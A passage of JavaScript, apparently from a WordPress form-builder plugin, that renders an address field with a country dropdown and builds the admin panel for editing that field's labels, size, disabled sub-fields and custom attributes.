						w_mini_labels[l] = document.getElementById('el_'+address_fields[l]+"_label").innerHTML;
				}
				else
				{
					var field = document.createElement('select');
						field.setAttribute("type", 'text');
						field.style.cssText = "width:100%";
						field.setAttribute("id", id+"_countryform_id_temp");
						field.setAttribute("name", (parseInt(id)+l)+"_countryform_id_temp");
						field.setAttribute("onChange", "change_state_input('"+id+"', 'form_id_temp')");

					var field_label = document.createElement('label');
						field_label.setAttribute("class", "mini_label");	
						field_label.setAttribute("id", id+"_mini_label_country");
						field_label.style.cssText = "display:block;";
						field_label.innerHTML=document.getElementById('el_'+address_fields[l]+"_label").innerHTML;
						w_mini_labels[l] = document.getElementById('el_'+address_fields[l]+"_label").innerHTML;
						
					var option_ = document.createElement('option');
						option_.setAttribute("value", "");
						option_.innerHTML="";
					field.appendChild(option_);
						
					coutries = ["Afghanistan","Albania",	"Algeria","Andorra","Angola","Antigua and Barbuda","Argentina","Armenia","Australia","Austria","Azerbaijan","Bahamas","Bahrain","Bangladesh","Barbados","Belarus","Belgium","Belize","Benin","Bhutan","Bolivia","Bosnia and Herzegovina","Botswana","Brazil","Brunei","Bulgaria","Burkina Faso","Burundi","Cambodia","Cameroon","Canada","Cape Verde","Central African Republic","Chad","Chile","China","Colombi","Comoros","Congo (Brazzaville)","Congo","Costa Rica","Cote d'Ivoire","Croatia","Cuba","Cyprus","Czech Republic","Denmark","Djibouti","Dominica","Dominican Republic","East Timor (Timor Timur)","Ecuador","Egypt","El Salvador","Equatorial Guinea","Eritrea","Estonia","Ethiopia","Fiji","Finland","France","Gabon","Gambia, The","Georgia","Germany","Ghana","Greece","Grenada","Guatemala","Guinea","Guinea-Bissau","Guyana","Haiti","Honduras","Hungary","Iceland","India","Indonesia","Iran","Iraq","Ireland","Israel","Italy","Jamaica","Japan","Jordan","Kazakhstan","Kenya","Kiribati","Korea, North","Korea, South","Kuwait","Kyrgyzstan","Laos","Latvia","Lebanon","Lesotho","Liberia","Libya","Liechtenstein","Lithuania","Luxembourg","Macedonia","Madagascar","Malawi","Malaysia","Maldives","Mali","Malta","Marshall Islands","Mauritania","Mauritius","Mexico","Micronesia","Moldova","Monaco","Mongolia","Morocco","Mozambique","Myanmar","Namibia","Nauru","Nepa","Netherlands","New Zealand","Nicaragua","Niger","Nigeria","Norway","Oman","Pakistan","Palau","Panama","Papua New Guinea","Paraguay","Peru","Philippines","Poland","Portugal","Qatar","Romania","Russia","Rwanda","Saint Kitts and Nevis","Saint Lucia","Saint Vincent","Samoa","San Marino","Sao Tome and Principe","Saudi Arabia","Senegal","Serbia and Montenegro","Seychelles","Sierra Leone","Singapore","Slovakia","Slovenia","Solomon Islands","Somalia","South Africa","Spain","Sri Lanka","Sudan","Suriname","Swaziland","Sweden","Switzerland","Syria","Taiwan","Tajikistan","Tanzania","Thailand","Togo","Tonga","Trinidad and Tobago","Tunisia","Turkey","Turkmenistan","Tuvalu","Uganda","Ukraine","United Arab Emirates","United Kingdom","United States","Uruguay","Uzbekistan","Vanuatu","Vatican City","Venezuela","Vietnam","Yemen","Zambia","Zimbabwe"];	
					
					for(r=0;r<coutries.length;r++)
					{
						var option_ = document.createElement('option');
							option_.setAttribute("value", coutries[r]);
							option_.innerHTML=coutries[r];
						field.appendChild(option_);
					}
				}	

				if(left_right%2!=0)	
				{
					var span_addres = document.createElement('span');
						span_addres.style.cssText = "float:left; width:48%; padding-bottom: 8px;";
				}
				else
				{
					var span_addres = document.createElement('span');
						span_addres.style.cssText = "float:right; width:48%; padding-bottom: 8px;";
				}	
					
				span_addres.appendChild(field);
				span_addres.appendChild(field_label);
				div.appendChild(span_addres);	
			}
		}
		else
		{
			var hidden_field = document.createElement('input');
				hidden_field.setAttribute("type", 'hidden');
				hidden_field.setAttribute("id", id+"_"+address_fields[l]+"form_id_temp");
				hidden_field.setAttribute("value", document.getElementById("el_"+address_fields[l]+"_label").innerHTML);
				hidden_field.setAttribute("id_for_label", parseInt(id)+l); 

				hidden_labels.push(hidden_field);
		}
		
		for(k=0; k<hidden_labels.length; k++)
			div.appendChild(hidden_labels[k]);
	}
	
	if(document.getElementById(id+"_disable_fieldsform_id_temp").getAttribute("state")=='no' && document.getElementById(id+"_disable_fieldsform_id_temp").getAttribute("country")=='yes')
		change_state_input(id,'form_id_temp');
		
	jQuery(document).ready(function(jQuery) {		
		jQuery("label#"+id+"_mini_label_street1").click(function() {			
			if (jQuery(this).children('input').length == 0) 
			{				
				var street1 = "<input type='text' class='street1' style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
				jQuery(this).html(street1);					
				jQuery("input.street1").focus();		
				jQuery("input.street1").blur(function() {	
					var value = jQuery(this).val();			
					jQuery("#"+id+"_mini_label_street1").text(value);		
					document.getElementById('el_street1_label').innerHTML=	value;	
				});		
			}	
		});		
	
		jQuery("label#"+id+"_mini_label_street2").click(function() {		
			if (jQuery(this).children('input').length == 0)
			{		
				var street2 = "<input type='text' class='street2'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
				jQuery(this).html(street2);					
				jQuery("input.street2").focus();		
				jQuery("input.street2").blur(function() {	
					var value = jQuery(this).val();			
					jQuery("#"+id+"_mini_label_street2").text(value);
					document.getElementById('el_street2_label').innerHTML=	value;		
				});		
			}	
		});	
	
		jQuery("label#"+id+"_mini_label_city").click(function() {	
			if (jQuery(this).children('input').length == 0)
			{	
				var city = "<input type='text' class='city'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
				jQuery(this).html(city);			
				jQuery("input.city").focus();				
				jQuery("input.city").blur(function() {			
					var value = jQuery(this).val();		
					jQuery("#"+id+"_mini_label_city").text(value);	
					document.getElementById('el_city_label').innerHTML=	value;		
				});		
			}	
		});	
	
		jQuery("label#"+id+"_mini_label_state").click(function() {		
			if (jQuery(this).children('input').length == 0)
			{	
				var state = "<input type='text' class='state'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";	
				jQuery(this).html(state);		
				jQuery("input.state").focus();		
				jQuery("input.state").blur(function() {		
					var value = jQuery(this).val();			
					jQuery("#"+id+"_mini_label_state").text(value);
					document.getElementById('el_state_label').innerHTML=	value;		
				});	
			}
		});		

		jQuery("label#"+id+"_mini_label_postal").click(function() {		
			if (jQuery(this).children('input').length == 0)
			{			
				var postal = "<input type='text' class='postal'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
				jQuery(this).html(postal);			
				jQuery("input.postal").focus();			
				jQuery("input.postal").blur(function() {			
					var value = jQuery(this).val();		
					jQuery("#"+id+"_mini_label_postal").text(value);	
					document.getElementById('el_postal_label').innerHTML=	value;		
				});	
			}
		});		
	
		jQuery("label#"+id+"_mini_label_country").click(function() {		
			if (jQuery(this).children('input').length == 0) 
			{		
				var country = "<input type='text' class='country'  style='outline:none; border:none; background:none;' value=\""+jQuery(this).text()+"\">";
				jQuery(this).html(country);		
				jQuery("input.country").focus();	
				jQuery("input.country").blur(function() {		
					var value = jQuery(this).val();			
					jQuery("#"+id+"_mini_label_country").text(value);
					document.getElementById('el_country_label').innerHTML=	value;				
				});	
			}	
		});
	});	
	
	refresh_attr(id,type);
}

function type_address(i, w_field_label, w_field_label_size, w_field_label_pos, w_size, w_mini_labels, w_disabled_fields, w_required, w_class, w_attr_name, w_attr_value)
{
	document.getElementById("element_type").value = "type_address";
	delete_last_child();
	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black;padding:10px;  padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "3");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
	var edit_main_tr2  = document.createElement('tr');
	var edit_main_tr4  = document.createElement('tr');
	var edit_main_tr5  = document.createElement('tr');
	var edit_main_tr6  = document.createElement('tr');
	var edit_main_tr7  = document.createElement('tr');
	var edit_main_tr8  = document.createElement('tr');
	var edit_main_tr9  = document.createElement('tr');
	var edit_main_tr10  = document.createElement('tr');
	
	var edit_main_td1 = document.createElement('td');
	var edit_main_td1_1 = document.createElement('td');
	var edit_main_td2 = document.createElement('td');
	var edit_main_td2_1 = document.createElement('td');
	var edit_main_td4 = document.createElement('td');
	var edit_main_td4_1 = document.createElement('td');
	var edit_main_td5 = document.createElement('td');
	var edit_main_td5_1 = document.createElement('td');
	var edit_main_td6 = document.createElement('td');
	var edit_main_td6_1 = document.createElement('td');
	var edit_main_td7 = document.createElement('td');
	var edit_main_td7_1 = document.createElement('td');
	var edit_main_td8 = document.createElement('td');
	var edit_main_td8_1 = document.createElement('td');
	var edit_main_td9 = document.createElement('td');
	var edit_main_td9_1 = document.createElement('td');
	var edit_main_td10 = document.createElement('td');
	var edit_main_td10_1 = document.createElement('td');
	
	var el_label_label = document.createElement('label');
		el_label_label.setAttribute("class", "fm-field-label");
		el_label_label.setAttribute("for", "edit_for_label");
		el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
		el_label_textarea.setAttribute("id", "edit_for_label");
		el_label_textarea.setAttribute("rows", "4");
		el_label_textarea.style.cssText = "width:200px;";
		el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
		el_label_textarea.innerHTML = w_field_label;
	
	var el_label_size_label = document.createElement('label');
		el_label_size_label.setAttribute("class", "fm-field-label");
	    el_label_size_label.setAttribute("for", "edit_for_label_size");
		el_label_size_label.innerHTML = "Field label size(px) ";
		
	var el_label_size = document.createElement('input');
	    el_label_size.setAttribute("id", "edit_for_label_size");
	    el_label_size.setAttribute("type", "text");
	    el_label_size.setAttribute("value", w_field_label_size);
		el_label_size.setAttribute("onKeyPress", "return check_isnum(event)");
        el_label_size.setAttribute("onKeyUp", "change_w_style('"+i+"_label_sectionform_id_temp', this.value)");
	
	var el_label_position_label = document.createElement('label');
		el_label_position_label.setAttribute("class", "fm-field-label");
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
		el_label_position1.setAttribute("id", "edit_for_label_position_top");
		el_label_position1.setAttribute("type", "radio");
		el_label_position1.setAttribute("name", "edit_for_label_position");
		el_label_position1.setAttribute("onchange", "label_left("+i+")");

	var el_label_left = document.createElement('label');
		el_label_left.setAttribute("for", "edit_for_label_position_top");
        el_label_left.innerHTML = "Left";	
		
	var el_label_position2 = document.createElement('input');
		el_label_position2.setAttribute("id", "edit_for_label_position_left");
		el_label_position2.setAttribute("type", "radio");
		el_label_position2.setAttribute("name", "edit_for_label_position");
		el_label_position2.setAttribute("onchange", "label_top("+i+")");
	
	var el_label_top = document.createElement('label');
		el_label_top.setAttribute("for", "edit_for_label_position_left");
        el_label_top.innerHTML = "Top";
		
	if(w_field_label_pos == "top")
		el_label_position2.setAttribute("checked", "checked");
	else
		el_label_position1.setAttribute("checked", "checked");

	var el_size_label = document.createElement('label');
		el_size_label.setAttribute("for", "edit_for_input_size");
		el_size_label.setAttribute("class", "fm-field-label");
		el_size_label.innerHTML = "Overall size(px) ";
	var el_size = document.createElement('input');
		el_size.setAttribute("id", "edit_for_input_size");
		el_size.setAttribute("type", "text");
		el_size.setAttribute("value", w_size);
		el_size.setAttribute("onKeyPress", "return check_isnum(event)");
		el_size.setAttribute("onKeyUp", "change_w_style('"+i+"_div_address', this.value);");
		
	var el_disable_field_label = document.createElement('label');
		el_disable_field_label.setAttribute("class", "fm-field-label");
		el_disable_field_label.innerHTML = "Disable Field(s)";

	var el_disable_address1 = document.createElement('input');
		el_disable_address1.setAttribute("id", "el_street1");
		el_disable_address1.setAttribute("type", "checkbox");
		el_disable_address1.setAttribute("value", "no");
		el_disable_address1.setAttribute("onclick", "disable_fields('"+i+"','street1')");
		if(w_disabled_fields[0] == "yes")
			el_disable_address1.setAttribute("checked", "checked");	
	
	var el_disable_address2 = document.createElement('input');
		el_disable_address2.setAttribute("id", "el_street2");
		el_disable_address2.setAttribute("type", "checkbox");
		el_disable_address2.setAttribute("value", "no");
		el_disable_address2.setAttribute("onclick", "disable_fields('"+i+"','street2')");
		if(w_disabled_fields[1] == "yes")
			el_disable_address2.setAttribute("checked", "checked");	
	
	var el_disable_city = document.createElement('input');
		el_disable_city.setAttribute("id", "el_city");
		el_disable_city.setAttribute("type", "checkbox");
		el_disable_city.setAttribute("value", "no");
		el_disable_city.setAttribute("onclick", "disable_fields('"+i+"','city')");
		if(w_disabled_fields[2] == "yes")
			el_disable_city.setAttribute("checked", "checked");	
	
	var el_disable_state = document.createElement('input');
		el_disable_state.setAttribute("id", "el_state");
		el_disable_state.setAttribute("type", "checkbox");
		el_disable_state.setAttribute("value", "no");
		el_disable_state.setAttribute("onclick", "disable_fields('"+i+"','state')");
		if(w_disabled_fields[3] == "yes")
			el_disable_state.setAttribute("checked", "checked");	
	
	var el_disable_postal = document.createElement('input');
		el_disable_postal.setAttribute("id", "el_postal");
		el_disable_postal.setAttribute("type", "checkbox");
		el_disable_postal.setAttribute("value", "no");
		el_disable_postal.setAttribute("onclick", "disable_fields('"+i+"','postal')");
		if(w_disabled_fields[4] == "yes")
			el_disable_postal.setAttribute("checked", "checked");
	
	var el_disable_country = document.createElement('input');
		el_disable_country.setAttribute("id", "el_country");
		el_disable_country.setAttribute("type", "checkbox");
		el_disable_country.setAttribute("value", "no");
		el_disable_country.setAttribute("onclick", "disable_fields('"+i+"','country')");
		if(w_disabled_fields[5] == "yes")
			el_disable_country.setAttribute("checked", "checked");			
			
	var el_required_label = document.createElement('label');
		el_required_label.setAttribute("class", "fm-field-label");
		el_required_label.setAttribute("for", "el_required");
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
		el_required.setAttribute("id", "el_required");
		el_required.setAttribute("type", "checkbox");     
		el_required.setAttribute("onclick", "set_required('"+i+"_required')");
		if(w_required == "yes")
			el_required.setAttribute("checked", "checked");	

	var el_style_label = document.createElement('label');
		el_style_label.setAttribute("class", "fm-field-label");
		el_style_label.setAttribute("for", "el_style_textarea");
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
		el_style_textarea.setAttribute("id", "el_style_textarea");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
		el_style_textarea.style.cssText = "width:200px;";
		el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");

	var el_attr_label = document.createElement('label');
		el_attr_label.setAttribute("class", "fm-field-label");      
		el_attr_label.innerHTML = "Additional Attributes";
		
	var el_attr_add = document.createElement('img');
		el_attr_add.setAttribute("src", plugin_url + '/images/add.png?ver=1.8.0');
		el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
		el_attr_add.setAttribute("title", 'add');
		el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_address')");
	var el_attr_table = document.createElement('table');
		el_attr_table.setAttribute("id", 'attributes');
		el_attr_table.setAttribute("border", '0');
		el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
		el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
		el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
		el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
		el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
		el_attr_name_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
		el_attr_value_label.style.cssText ="color:#000; font-weight:bold; font-size: 11px";
		el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n = w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
			el_attr_name.setAttribute("type", "text");
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_address')");
			
		var el_attr_value = document.createElement('input');
			el_attr_value.setAttribute("type", "text");
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_address')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px';
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_address')");
			
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);	
	}
	
	var el_us_states_label = document.createElement('label');
		el_us_states_label.setAttribute("class", "fm-field-label");  
		el_us_states_label.setAttribute("for", "el_us_states");  
		el_us_states_label.innerHTML = "Use list for US states";
	
	var el_disable_us_states = document.createElement('input');
		el_disable_us_states.setAttribute("id", "el_us_states");
		el_disable_us_states.setAttribute("type", "checkbox");
		el_disable_us_states.setAttribute("value", "yes");
		el_disable_us_states.setAttribute("onclick", "disable_fields('"+i+"','us_states')");
		if(w_disabled_fields[6] == "yes")
			el_disable_us_states.setAttribute("checked", "checked"); 
	
	var el_street1 = document.createTextNode(w_mini_labels[0]);
	var el_street2 = document.createTextNode(w_mini_labels[1]);
	var el_city = document.createTextNode(w_mini_labels[2]);
	var el_state = document.createTextNode(w_mini_labels[3]);
	var el_postal = document.createTextNode(w_mini_labels[4]);
	var el_country = document.createTextNode(w_mini_labels[5]);
	
	var el_street1_label = document.createElement('label');
		el_street1_label.setAttribute("for", "el_street1");
		el_street1_label.setAttribute("id", "el_street1_label");
	
	var el_street2_label = document.createElement('label');
		el_street2_label.setAttribute("for", "el_street2");
		el_street2_label.setAttribute("id", "el_street2_label");
	
	var el_city_label = document.createElement('label');
		el_city_label.setAttribute("for", "el_city");
		el_city_label.setAttribute("id", "el_city_label");
	
	var el_state_label = document.createElement('label');
		el_state_label.setAttribute("for", "el_state");
		el_state_label.setAttribute("id", "el_state_label");
	
	var el_postal_label = document.createElement('label');
		el_postal_label.setAttribute("for", "el_postal");
		el_postal_label.setAttribute("id", "el_postal_label");
	
	var el_country_label = document.createElement('label');
		el_country_label.setAttribute("for", "el_country");
		el_country_label.setAttribute("id", "el_country_label");
	
	el_street1_label.appendChild(el_street1);
	el_street2_label.appendChild(el_street2);
	el_city_label.appendChild(el_city);
	el_state_label.appendChild(el_state);
	el_postal_label.appendChild(el_postal);
	el_country_label.appendChild(el_country);
	
	var t  = document.getElementById('edit_table');	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	var br7 = document.createElement('br');

	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td9.appendChild(el_label_size_label);
	edit_main_td9_1.appendChild(el_label_size);
	
	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(el_label_left);
	edit_main_td2_1.appendChild(br);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(el_label_top);
	
	edit_main_td7.appendChild(el_size_label);
	edit_main_td7_1.appendChild(el_size);
	
	edit_main_td4.appendChild(el_style_label);
	edit_main_td4_1.appendChild(el_style_textarea);
	
	edit_main_td5.appendChild(el_required_label);
	edit_main_td5_1.appendChild(el_required);
	
	edit_main_td8.appendChild(el_disable_field_label);
	edit_main_td8_1.appendChild(el_disable_address1);
	edit_main_td8_1.appendChild(el_street1_label);
	edit_main_td8_1.appendChild(br1);
	edit_main_td8_1.appendChild(el_disable_address2);
	edit_main_td8_1.appendChild(el_street2_label);
	edit_main_td8_1.appendChild(br2);
	edit_main_td8_1.appendChild(el_disable_city);
	edit_main_td8_1.appendChild(el_city_label);
	edit_main_td8_1.appendChild(br3);
	edit_main_td8_1.appendChild(el_disable_state);
	edit_main_td8_1.appendChild(el_state_label);
	edit_main_td8_1.appendChild(br4);
	edit_main_td8_1.appendChild(el_disable_postal);
	edit_main_td8_1.appendChild(el_postal_label);
	edit_main_td8_1.appendChild(br5);
	edit_main_td8_1.appendChild(el_disable_country);
	edit_main_td8_1.appendChild(el_country_label);
	edit_main_td8_1.appendChild(br6);

	edit_main_td10.appendChild(el_us_states_label);
	edit_main_td10_1.appendChild(el_disable_us_states);
	
	
	
	edit_main_td6.appendChild(el_attr_label);
	edit_main_td6.appendChild(el_attr_add);
	edit_main_td6.appendChild(br7);
	edit_main_td6.appendChild(el_attr_table);
	edit_main_td6.setAttribute("colspan", "2");
	
	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr9.appendChild(edit_main_td9);
	edit_main_tr9.appendChild(edit_main_td9_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr7.appendChild(edit_main_td7_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr10.appendChild(edit_main_td10);
	edit_main_tr10.appendChild(edit_main_td10_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr9);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr7);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr10);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr6);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	add_id_and_name(i, 'type_address');

	var adding_type = document.createElement("input");
		adding_type.setAttribute("type", "hidden");
		adding_type.setAttribute("value", "type_address");
		adding_type.setAttribute("name", i+"_typeform_id_temp");
		adding_type.setAttribute("id", i+"_typeform_id_temp");
			
	var adding_country= document.createElement("input");
		adding_country.setAttribute("type", "hidden");
		adding_country.setAttribute("name", i+"_disable_fieldsform_id_temp");
		adding_country.setAttribute("id", i+"_disable_fieldsform_id_temp");	
		adding_country.setAttribute("street1", w_disabled_fields[0]);
		adding_country.setAttribute("street2", w_disabled_fields[1]);
		adding_country.setAttribute("city", w_disabled_fields[2]);
		adding_country.setAttribute("state", w_disabled_fields[3]);
		adding_country.setAttribute("us_states", w_disabled_fields[6]);
		adding_country.setAttribute("postal", w_disabled_fields[4]);
		adding_country.setAttribute("country", w_disabled_fields[5]);
            		
	var adding_required = document.createElement("input");
		adding_required.setAttribute("type", "hidden");
		adding_required.setAttribute("value", w_required);
		adding_required.setAttribute("name", i+"_requiredform_id_temp");
		adding_required.setAttribute("id", i+"_requiredform_id_temp");

	var div = document.createElement('div');
		div.setAttribute("id", "main_div");
	
	var edit_labels = document.createTextNode("The labels of the fields are editable. Please, click the label to edit.");
	var div_for_editable_labels = document.createElement('div');
		div_for_editable_labels.setAttribute("style", "margin-left:4px; color:red; display:inline-block;");
		div_for_editable_labels.appendChild(edit_labels);  	
					
	var div_field = document.createElement('div');
		div_field.setAttribute("id", i+"_elemet_tableform_id_temp");
						
	var div_label = document.createElement('div');
		div_label.setAttribute("align", 'left');
		div_label.style.display="table-cell";
		div_label.style.width=w_field_label_size+"px";
		div_label.style.verticalAlign="top";
		div_label.setAttribute("id", i+"_label_sectionform_id_temp");
			
	var div_element = document.createElement('div');
		div_element.setAttribute("align", 'left');
		div_element.style.display="table-cell";
		div_element.setAttribute("id", i+"_element_sectionform_id_temp");
			
	var div_address = document.createElement('div');
		div_address.setAttribute("id", i+"_div_address");
		div_address.style.cssText = "width:"+w_size+"px";
		
	var span_addres1 = document.createElement('span');
		span_addres1.style.cssText = "float:left; width:100%;  padding-bottom: 8px; display:block";
		
	var span_addres2 = document.createElement('span');
		span_addres2.style.cssText = "float:left; width:100%;  padding-bottom: 8px; display:block";
		
	var span_addres3_1 = document.createElement('span');
		span_addres3_1.style.cssText = "float:left; width:48%; padding-bottom: 8px;";
	
	var span_addres3_2 = document.createElement('span');
		span_addres3_2.style.cssText = "float:right; width:48%; padding-bottom: 8px;";
	
	var span_addres4_1 = document.createElement('span');
		span_addres4_1.style.cssText = "float:left; width:48%; padding-bottom: 8px;";
	
	var span_addres4_2 = document.createElement('span');
		span_addres4_2.style.cssText = "float:right; width:48%; padding-bottom: 8px;";

	var br = document.createElement('br');    
	var label = document.createElement('span');
		label.setAttribute("id", i+"_element_labelform_id_temp");
		label.innerHTML = w_field_label;
		label.setAttribute("class", "wd_form_label");
		label.style.verticalAlign="top";
	    
	var required = document.createElement('span');
		required.setAttribute("id", i+"_required_elementform_id_temp");
		required.innerHTML = "";
		required.setAttribute("class", "required");
		required.style.verticalAlign="top";
		if(w_required == "yes")
			required.innerHTML = " *";	
			
	var street1 = document.createElement('input');
        street1.setAttribute("type", 'text');
	    street1.style.cssText = "width:100%";
	    street1.setAttribute("id", i+"_street1form_id_temp");
	    street1.setAttribute("name", i+"_street1form_id_temp");
	    street1.setAttribute("onChange", "change_value('"+i+"_street1form_id_temp')");
			
	var street1_label = document.createElement('label');
	    street1_label.setAttribute("class", "mini_label");
		street1_label.setAttribute("id", i+"_mini_label_street1");
	    street1_label.style.cssText = "display:block;";
	    street1_label.innerHTML = w_mini_labels[0];
			
	var street2 = document.createElement('input');
        street2.setAttribute("type", 'text');
		street2.style.cssText = "width:100%";
		street2.setAttribute("id", i+"_street2form_id_temp");
	   	street2.setAttribute("name", (parseInt(i)+1)+"_street2form_id_temp");
		street2.setAttribute("onChange", "change_value('"+i+"_street2form_id_temp')");

	var street2_label = document.createElement('label');
		street2_label.setAttribute("class", "mini_label");
	    street2_label.setAttribute("id", i+"_mini_label_street2");
	    street2_label.style.cssText = "display:block;";
		street2_label.innerHTML = w_mini_labels[1];
			
	var city = document.createElement('input');
        city.setAttribute("type", 'text');
		city.style.cssText = "width:100%";
		city.setAttribute("id", i+"_cityform_id_temp");
	   	city.setAttribute("name", (parseInt(i)+2)+"_cityform_id_temp");
		city.setAttribute("onChange", "change_value('"+i+"_cityform_id_temp')");

	var city_label = document.createElement('label');
		city_label.setAttribute("class", "mini_label");
	    city_label.setAttribute("id", i+"_mini_label_city");
	    city_label.style.cssText = "display:block;";
		city_label.innerHTML = w_mini_labels[2];
			
	var state = document.createElement('input');
        state.setAttribute("type", 'text');
		state.style.cssText = "width:100%";
		state.setAttribute("id", i+"_stateform_id_temp");
	   	state.setAttribute("name", (parseInt(i)+3)+"_stateform_id_temp");
		state.setAttribute("onChange", "change_value('"+i+"_stateform_id_temp')");

	var state_label = document.createElement('label');
		state_label.setAttribute("class", "mini_label");
	    state_label.setAttribute("id", i+"_mini_label_state");
	    state_label.style.cssText = "display:block;";
		state_label.innerHTML = w_mini_labels[3];

	var postal = document.createElement('input');
        postal.setAttribute("type", 'text');
		postal.style.cssText = "width:100%";
		postal.setAttribute("id", i+"_postalform_id_temp");
	   	postal.setAttribute("name", (parseInt(i)+4)+"_postalform_id_temp");
		postal.setAttribute("onChange", "change_value('"+i+"_postalform_id_temp')");

	var postal_label = document.createElement('label');
		postal_label.setAttribute("class", "mini_label");
	    postal_label.setAttribute("id", i+"_mini_label_postal");
	    postal_label.style.cssText = "display:block;";
		postal_label.innerHTML = w_mini_labels[4];
			
	var country = document.createElement('select');
        country.setAttribute("type", 'text');
		country.style.cssText = "width:100%";
		country.setAttribute("id", i+"_countryform_id_temp");
	   	country.setAttribute("name", (parseInt(i)+5)+"_countryform_id_temp");
		country.setAttribute("onChange", "change_state_input('"+i+"','form_id_temp')");

	var country_label = document.createElement('label');
		country_label.setAttribute("class", "mini_label");
	    country_label.setAttribute("id", i+"_mini_label_country");
	    country_label.style.cssText = "display:block;";
		country_label.innerHTML=w_mini_labels[5];

	var option_ = document.createElement('option');
		option_.setAttribute("value", "");
		option_.innerHTML = "";
		
	country.appendChild(option_);
